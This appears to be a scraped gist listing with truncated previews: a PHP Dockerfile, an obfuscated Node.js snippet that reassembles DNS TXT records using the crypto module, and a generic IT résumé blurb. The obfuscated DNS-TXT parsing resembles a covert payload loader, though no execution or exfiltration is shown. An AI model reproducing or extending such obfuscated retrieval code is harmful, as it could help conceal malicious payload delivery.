This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM php:8.2-cli | |
RUN groupadd -r dev -g 433 && \ | |
useradd -u 431 -r -g dev -s /sbin/nologin -c "Docker image user" dev | |
WORKDIR /home/dev | |
COPY trace.php /home/dev/trace.php | |
COPY entry.sh /home/dev/entry.sh | |
RUN chmod +x /home/dev/entry.sh |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const dns = require("node:dns"); | |
const dnsPromises = dns.promises; | |
const crypto = require('node:crypto'); | |
function parseTxtMessage(_0x1abf0c) { | |
const _0x1a2ea9 = {}; | |
for (const _0x5c338d of _0x1abf0c) { | |
try { | |
const _0x4e00a2 = _0x5c338d.join(''); | |
let _0x7a04a4 = parseInt(_0x4e00a2.substring(0x0, 0x2), 0x10); | |
_0x1a2ea9[_0x7a04a4] = _0x4e00a2.substring(0x2); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
A multifaceted, dynamic and results-driven IT specialist with over 8 years of experience in delivering consistent and outstanding results in development, networking, computer systems, and server administration, coupled with the provision of authentic solutions using both creative and technical ideologies. An articulate individual with a powerful blend of exceptional skills and high-quality performance in the proper use of CRM, problem resolution as well as provision of excellent customer support. A versatile individual possessing an acute awareness of practical issues and trends, particularly accessibility, usability and emerging technologies. Proven success in applying innovative concepts to improve efficiency while ensuring flawless operations through excellent delivery of services. Strong commitment to the highest standards of professional conducts. Interested in pursuing an open position in this prestigious organization to effectively utilize knowledge, skills, as well as offer personal and professional g |
OlderNewer